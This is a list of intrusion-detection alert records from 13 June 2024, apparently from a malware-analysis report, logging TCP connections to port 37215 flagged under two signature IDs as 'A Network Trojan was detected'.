              Timestamp:06/13/24-21:32:40.355299
              SID:2829579
              Source Port:39498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677464
              SID:2835222
              Source Port:52192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439282
              SID:2835222
              Source Port:49408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908207
              SID:2835222
              Source Port:54292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608088
              SID:2829579
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257561
              SID:2835222
              Source Port:36720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556026
              SID:2835222
              Source Port:60716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177608
              SID:2835222
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376864
              SID:2835222
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659234
              SID:2835222
              Source Port:55280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994124
              SID:2829579
              Source Port:48436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488658
              SID:2829579
              Source Port:34168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508321
              SID:2829579
              Source Port:53842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697582
              SID:2835222
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801248
              SID:2835222
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702441
              SID:2835222
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252479
              SID:2829579
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.092029
              SID:2835222
              Source Port:49820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836097
              SID:2835222
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506133
              SID:2829579
              Source Port:47542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040148
              SID:2829579
              Source Port:36618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153578
              SID:2835222
              Source Port:51786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091429
              SID:2835222
              Source Port:43564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871470
              SID:2835222
              Source Port:33838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228636
              SID:2829579
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675112
              SID:2835222
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356033
              SID:2835222
              Source Port:42184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573578
              SID:2835222
              Source Port:37790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269572
              SID:2829579
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089297
              SID:2835222
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709782
              SID:2835222
              Source Port:60204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679107
              SID:2829579
              Source Port:44424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654307
              SID:2829579
              Source Port:34970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257263
              SID:2835222
              Source Port:57350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256983
              SID:2829579
              Source Port:43786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309170
              SID:2829579
              Source Port:48626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377196
              SID:2835222
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478081
              SID:2829579
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041529
              SID:2829579
              Source Port:60944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085024
              SID:2829579
              Source Port:50884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674778
              SID:2835222
              Source Port:44452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786207
              SID:2829579
              Source Port:50532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092782
              SID:2835222
              Source Port:48238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406674
              SID:2835222
              Source Port:45440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629070
              SID:2829579
              Source Port:60246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377108
              SID:2835222
              Source Port:44948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213372
              SID:2835222
              Source Port:59638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731093
              SID:2835222
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210456
              SID:2835222
              Source Port:46230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091479
              SID:2835222
              Source Port:36646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217565
              SID:2829579
              Source Port:42990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503752
              SID:2835222
              Source Port:42536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196283
              SID:2835222
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833389
              SID:2835222
              Source Port:50190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044008
              SID:2829579
              Source Port:55054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238840
              SID:2835222
              Source Port:53094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150294
              SID:2829579
              Source Port:56902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867615
              SID:2835222
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.907277
              SID:2829579
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678534
              SID:2835222
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294295
              SID:2835222
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869528
              SID:2835222
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269314
              SID:2829579
              Source Port:38666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338867
              SID:2829579
              Source Port:43598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729758
              SID:2835222
              Source Port:40848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457865
              SID:2829579
              Source Port:60146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805154
              SID:2835222
              Source Port:35554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199817
              SID:2835222
              Source Port:42972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943122
              SID:2829579
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402456
              SID:2835222
              Source Port:53156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421926
              SID:2835222
              Source Port:46744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823787
              SID:2835222
              Source Port:33192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309927
              SID:2835222
              Source Port:55870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129811
              SID:2829579
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405911
              SID:2829579
              Source Port:40730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914722
              SID:2835222
              Source Port:46784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213283
              SID:2835222
              Source Port:43340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524412
              SID:2829579
              Source Port:50146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510171
              SID:2835222
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295057
              SID:2829579
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678381
              SID:2835222
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016512
              SID:2829579
              Source Port:35422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456779
              SID:2829579
              Source Port:56420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638319
              SID:2835222
              Source Port:34674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440540
              SID:2829579
              Source Port:57086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152648
              SID:2829579
              Source Port:34318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708990
              SID:2829579
              Source Port:33588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676246
              SID:2829579
              Source Port:50952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729354
              SID:2829579
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527835
              SID:2829579
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802238
              SID:2829579
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749318
              SID:2829579
              Source Port:33220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991505
              SID:2835222
              Source Port:56758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338960
              SID:2829579
              Source Port:56546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376549
              SID:2835222
              Source Port:52908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553662
              SID:2835222
              Source Port:44876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160748
              SID:2835222
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804397
              SID:2835222
              Source Port:59398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316390
              SID:2835222
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457845
              SID:2835222
              Source Port:36458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487158
              SID:2835222
              Source Port:43918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213284
              SID:2835222
              Source Port:49550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136334
              SID:2829579
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805792
              SID:2829579
              Source Port:38228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419972
              SID:2835222
              Source Port:54818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456656
              SID:2835222
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277361
              SID:2835222
              Source Port:42672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089707
              SID:2835222
              Source Port:40574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230994
              SID:2829579
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197104
              SID:2835222
              Source Port:35620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265781
              SID:2829579
              Source Port:48888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372818
              SID:2829579
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315992
              SID:2829579
              Source Port:51808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025154
              SID:2829579
              Source Port:35760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478339
              SID:2829579
              Source Port:55220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730965
              SID:2835222
              Source Port:54310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027845
              SID:2835222
              Source Port:46210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128503
              SID:2835222
              Source Port:36644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213937
              SID:2829579
              Source Port:58066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480563
              SID:2829579
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871519
              SID:2829579
              Source Port:60764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279674
              SID:2835222
              Source Port:36802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195314
              SID:2829579
              Source Port:56234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973790
              SID:2829579
              Source Port:37506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610982
              SID:2835222
              Source Port:40172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278728
              SID:2829579
              Source Port:41316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218173
              SID:2829579
              Source Port:33582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545693
              SID:2829579
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358470
              SID:2835222
              Source Port:58580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502228
              SID:2835222
              Source Port:47050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993543
              SID:2835222
              Source Port:43678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991905
              SID:2835222
              Source Port:45500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135834
              SID:2829579
              Source Port:48138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416270
              SID:2835222
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303244
              SID:2829579
              Source Port:52540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102106
              SID:2829579
              Source Port:60270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670360
              SID:2835222
              Source Port:51272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247603
              SID:2835222
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300861
              SID:2829579
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942166
              SID:2835222
              Source Port:53342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026291
              SID:2835222
              Source Port:52978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245247
              SID:2829579
              Source Port:40618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307323
              SID:2829579
              Source Port:50724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211275
              SID:2835222
              Source Port:56788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094538
              SID:2829579
              Source Port:60782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502877
              SID:2835222
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092117
              SID:2829579
              Source Port:44590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128755
              SID:2835222
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377149
              SID:2829579
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124038
              SID:2835222
              Source Port:46598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972521
              SID:2829579
              Source Port:34648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180963
              SID:2829579
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305882
              SID:2829579
              Source Port:47906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077695
              SID:2835222
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988584
              SID:2835222
              Source Port:59476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509450
              SID:2835222
              Source Port:57242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298582
              SID:2835222
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730934
              SID:2829579
              Source Port:46250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175246
              SID:2829579
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255101
              SID:2829579
              Source Port:60900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406731
              SID:2835222
              Source Port:47436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403863
              SID:2835222
              Source Port:50280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242721
              SID:2829579
              Source Port:40810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759124
              SID:2829579
              Source Port:45852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834592
              SID:2829579
              Source Port:55510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215717
              SID:2835222
              Source Port:48398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730374
              SID:2829579
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869180
              SID:2829579
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273734
              SID:2835222
              Source Port:55644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544465
              SID:2835222
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132872
              SID:2829579
              Source Port:45728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373011
              SID:2835222
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439220
              SID:2829579
              Source Port:45382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127391
              SID:2835222
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670837
              SID:2835222
              Source Port:48572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805953
              SID:2829579
              Source Port:55346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833653
              SID:2835222
              Source Port:44880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215754
              SID:2829579
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308757
              SID:2835222
              Source Port:39506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696549
              SID:2829579
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262891
              SID:2829579
              Source Port:52254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198292
              SID:2829579
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938746
              SID:2829579
              Source Port:39148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937360
              SID:2835222
              Source Port:54050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824760
              SID:2829579
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824945
              SID:2829579
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632638
              SID:2835222
              Source Port:59200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305587
              SID:2835222
              Source Port:34690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823944
              SID:2835222
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564016
              SID:2835222
              Source Port:54406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632326
              SID:2829579
              Source Port:38288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822178
              SID:2829579
              Source Port:47384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277506
              SID:2829579
              Source Port:40916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406308
              SID:2835222
              Source Port:51154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993862
              SID:2829579
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154789
              SID:2829579
              Source Port:36938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415360
              SID:2829579
              Source Port:34274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546832
